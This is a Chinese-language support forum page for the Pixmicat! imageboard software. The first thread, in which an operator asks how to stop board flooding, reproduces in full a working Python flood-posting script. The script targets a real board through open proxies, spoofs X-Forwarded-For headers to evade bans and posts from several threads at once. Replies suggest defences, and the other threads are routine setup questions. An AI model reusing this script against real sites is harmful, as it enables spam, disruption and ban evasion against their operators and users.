[投稿隱藏表單]
名 稱
E-mail
標 題
內 文
附加圖檔[] []
類別標籤(請以 , 逗號分隔多個標籤)
刪除用密碼(刪除文章用。英數字8字元以內)
  • 可附加圖檔類型:GIF, JPG, PNG,瀏覽器才能正常附加圖檔
  • 附加圖檔最大上傳資料量為 512 KB。當回文時E-mail填入sage為不推文功能
  • 當檔案超過寬 250 像素、高 250 像素時會自動縮小尺寸顯示
  • 目前附加圖檔使用量大小: 25090 KB / 51200 KB
  • 程式碼可使用 [code][/code] 以 google-code-prettify 標亮 (程式自動判斷語言類別)
  • 本版因各種原因有鎖關鍵字,請至字詞黑名單一覽查詢。
  • 這裡是貼圖版程式 Pixmicat! 的相關使用問題回報討論版
  • 本版不是測試版!請自重勿隨意推舊文,謝謝合作

主題一覽
3504: ImageMagick安全漏洞 (0)3488: 無標題 (1)
3503: 適用於 8th.R4 的另類 mod_adminenhance? (0)3486: 請問架一個記憶體需要多少呢? (1)
3501: ADMIN刪除文章 (1)3484: MySQL 指令問題 (1)
3498: pixmicat 5 升級至 8 (1)3475: 有關升級 (6)
3497: pio 8.0 管理員密碼 (0)3473: 無標題 (1)
3496: Ninja (0)3470: 關於 Pixmicat網頁 (2)
3494: 關於錯誤訊息 (1)3468: 無標題 (3)
3493: 密碼錯誤 (1)3466: Pixmicat!-PIO 8th Release.4 (1)
3492: Pixmicat正式URL掛了? (0)3463: 美國知名程式碼代管網站GitHub (0)
3490: 有報錯但不影響運行 (1)3461: Pixmicat!-PIO 使用MySQL資料庫出現問題 (3)
關於洗板的問題 名稱: 0ya◆AbrRnV/UVw [12/08/17(五)00:34 ID:wOBR5m0.] No.3251  [回應]
想請問一下,前陣子碰到有人針對futaba板面寫了洗板程式
但發現能應對的方式很少,不知道有什麼好方法可以阻止這種攻擊??
thanks~

內容
import urllib.request
import urllib.parse
import urllib.error
import socket
import http.cookiejar
import random
import threading

#V!entoFur10so


proxy_table = ['proxy.hinet.net:80',
'proxy.gsn.gov.tw:80', #prefer this
'23.22.95.3:8080',
'5.9.240.159:8080',
'147.102.26.112:8888',
'85.255.204.191:3128',
'200.195.158.219:8080',
'81.219.228.194:8080',
'201.217.60.180:8080'
]

def spoof_ip():
#
#請使用固定制class-C spoofing, 避免誤鎖範圍擴大
#
s = '114.137.164.'+str(random.randrange(0, 256)) #fixed class c spoofing

return s


def main(index, target):

#build a cookie event handling
cookie = http.cookiejar.CookieJar()
cookie_handler = urllib.request.HTTPCookieProcessor(cookie)

#http request will via PROXY
proxy_handler = urllib.request.ProxyHandler({'http': proxy_table[index]})


#implemeto funcs sobre
opener = urllib.request.build_opener(cookie_handler, proxy_handler)
urllib.request.install_opener(opener)

dict_general = {'mode': 'regist',
'MAX_FILE_SIZE': '524288',
'resto': target,
'name': '',
'email': 'sage',
'sub': '',
'comx705': ' \n輸入發送內容\n\n',
'upfile': '',
'textonly': 1,
'pwd':''
}
ip = spoof_ip()
print('using x-forwarded-for ip:', ip, ' \n')
header = {'User-Agent': 'general_cleaner',
'X-Forwarded-For': ip,
'Via': ''
}

encoded_data = urllib.parse.urlencode(dict_general).encode(encoding='utf_8', errors='strict')

try:
res = urllib.request.Request('http://vita.komica.org/00/index.php', encoded_data, header, 5)
x = urllib.request.urlopen(res, None, 5)
page_file = x.read().decode('UTF-8')
except (urllib.error.HTTPError, urllib.error.URLError, socket.error, TypeError) as e:
print(e, 'result to ', proxy_table[index])
return


if '密碼錯誤' in page_file:
print('fail')
elif '連続投稿' in page_file:
print('連續投稿', ' \n')
elif '画面を切り替えます' in page_file:
print('posting success', ' \n')

elif '公開PROXY規制中' in page_file:
print('IP blocked', ' \n')

def run_x_times_for_each_thread(x, t, t_number):
for i in range(0, x):
p_index = 1
print('USING PROXY:', proxy_table[p_index], 'From Thread:', t_number, ' \n')
main(p_index, t)
def go(t):
for i in range(0, 6):# run 5 threads
try:
t_res = threading.Thread(target = run_x_times_for_each_thread,
args = (5, t, i))
t_res.start()
except Exception as e:
print(e)
return
print('done')
return
無標題 名稱: 無名氏 [12/08/17(五)11:51 ID:lk/Q5k8k] No.3252   
1. 加CAPTCHA

2. 不要相信Header的X-Forwarded-For資訊

3. 阻擋CSRF要求
無標題 名稱: 無名氏 [12/08/18(六)08:54 ID:IVD.pzJo] No.3253   
到這年頭還在用futaba本身就有問題
1883所管的版面從來沒更新過
也別寄望他會採取什麼有效的洗版對策了
無標題 名稱: 0ya◆AbrRnV/UVw [12/09/08(六)13:34 ID:HMeR9XUI] No.3256 5推  
>>No.3253
這個我有跟他討論過,我是提出更新板面可以減少很多管理上的不便,還有溝通的時效性等,但他說沒有必要
就...囧

>>No.3252
這幾個我會去研究看看,謝謝
無名氏: 1883什麼都不想管 當然說沒必要... (9ZKirtsM 12/09/13 18:00)
BogusX◆bMoZ2fGlbA: 有詢問過了,但是他用另一種方式處理。 (OgbrC5RI 12/09/21 10:23)
無名氏: 擺爛式管理 (eR8DmrFM 12/09/21 13:05)
0ya◆AbrRnV/UVw: 這個洗板的跟他討論很久,後來也解決了(吧),反正現在是沒有再洗了 (RlNwAWlM 12/09/25 00:08)
無名氏: 電腦糞版主來發廢文笑笑喔 (LVyZ6jv6 13/01/07 19:36)
無標題 名稱: 無名氏 [13/01/08(二)04:31 ID:XVJIkkQc] No.3261 1推  
有點離題,

每個留言方塊加個id (div或span)包著
方便使用者針對個別id做過濾
可用不同方法: 自己用proxomitron, 可以把html處理過後才表示出來。
治標不治本, 但不用什麼也要等管理員來搞
◆ScRBg4WCkk: 早就有囉,div#r{ID} (3ZaBCX5Y 13/01/08 18:34)

無標題 名稱: 無名氏 [12/11/19(一)04:12 ID:mVDSSiz2] No.3259 3推 [回應]
請問是否有禁止特定文字的模組?
感覺可以有系綠的妨礙特定洗板或是廚文
無名氏: 效率* (mVDSSiz2 12/11/19 04:12)
無名氏: 內建的黑名單就是啦,不過廚馬上就會換用語,沒用啦。 (12fdmOts 12/11/19 23:55)
無名氏: 沒用+1 (體會過 (abxPyN5Y 12/11/27 19:16)

不能用FF或Chrome回應? 名稱: 無名氏 [12/10/04(四)00:31 ID:UzuwzBWk] No.3257  [回應]
請問一下為什麼用FF或Chrome回應文章時會出現:

XML 解析錯誤: 不符合的標籤。應有: </br>。

行號 60, 第 3 個字:</ul>
--^
無標題 名稱: 無名氏 [12/10/05(五)14:55 ID:AUnKVnQk] No.3258 1推  
http://pixmicat.wikidot.com/pmcfaq#toc1

XHTML的空標籤是要加上/標記的。
像是<br/>這樣才可以。
l;: l;l (sQjQSZ7. 12/11/01 06:43)

無標題 名稱: GT◆JS9KQRiUf2 [12/08/30(四)01:34 ID:cDCWVTXM] No.3255 2推 [回應]
大家好
之前裝了 PIO 4th.Anniversary 之後
過了一陣子發現 我推文的時候
推文會出現一個新的頁面 ex: http://gtfutaba.net23.net/futaba.php?mode=module&load=mod_pushpost&no=461

而不是折疊式的 請問這是版本過舊還是??
無名氏: 需要 jQuery 函式庫,架設教學有 (7JUdkP/c 12/08/30 13:33)
GT◆JS9KQRiUf2: 非常感謝 (BARepmVM 12/08/31 00:06)

投稿後無法回到首頁 名稱: 孤狼 [12/08/29(三)21:40 ID:dfLeE8Tg] No.3254 1推 [回應]
大家好,嘗試安裝好之後,再測試投稿的時候,按下送出之後,
會出現pixmicat.php 無法顯示的問題 (也就是說它不會跳回去首頁)
然而直接輸入http://{IP}/pixmicat.php 會自動跳到index.html 去。
麻煩大家代為解惑。

安裝環境為:
WinXP Pro
WAMP. (PHP 5.3, Apache 2.2, MySQL 5)
pixmicat 程式是直接抓 SVN上的。
無名氏: 無法顯示可能是有錯誤,看看apache log紀錄;後者直接輸入跳轉是正常現象。 (7JUdkP/c 12/08/30 13:34)

pixmicat-pio6 DB寫入問題 名稱: 無名氏 [12/06/27(三)10:57 ID:wGBGrMqI] No.3242 4推 [回應]
我在嘗試架設pixmicat-pio6版時出現 Fatal error: Pixmicat! SQL Error: Insert a new post failed on line 381 in /home/ryan/boards/w/lib/pio/pio.mysql.php on line 26
我確定DB的帳號密碼沒錯,但是作初始化會失敗,出現以上訊息

我的系統環境是
Ubuntu 12.04 x86
Nginx 1.2.1
PHP 5.3.10 (PHP-FPM)
MySQL 5.5.24
◆ScRBg4WCkk: 應該是MySQL 5.5的相容問題,svn裡有修正,但6th.Release沒有。 (kdYx2Ulc 12/06/27 16:32)
◆ScRBg4WCkk: 可自行到SVN版本庫抓一份/PIO/lib/pio/pio.mysql.php自救 (oCGMoNz. 12/06/27 17:26)
無名氏: Revision 826: /PIO/lib/pio/pio.mysql.php 一樣的問題 (3vxPh47s 12/07/29 00:14)
無名氏: mysql 5.1.41-3ubuntu (3vxPh47s 12/07/29 00:21)
無標題 名稱: 無名氏 [12/07/29(日)01:52 ID:3vxPh47s] No.3250 2推  
追了一下,看起來svn裡面的也沒寫錯,生成的sql是正確的,直接丟去mysql client跑正常,但是不知道為什麼只要在初始化區段中跑,insert第一行的時候就會失敗跳出...
現在是手動初始化在使用...
無名氏: PHP使用的使用者沒有權限? 猜測啦。因為你丟client跑可能是root (H3S/vx/M 12/08/02 23:09)
無名氏: 不是mysql權限問題,因為只有初始化時insert會卡,手動過去以後使用者貼文都沒發生問題 (oOb9DIaQ 12/08/09 08:20)

【刪除文章】[]
刪除用密碼:
[0] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] [31] [32] [33] [34] [35] [36] [37] [38] [39] [40]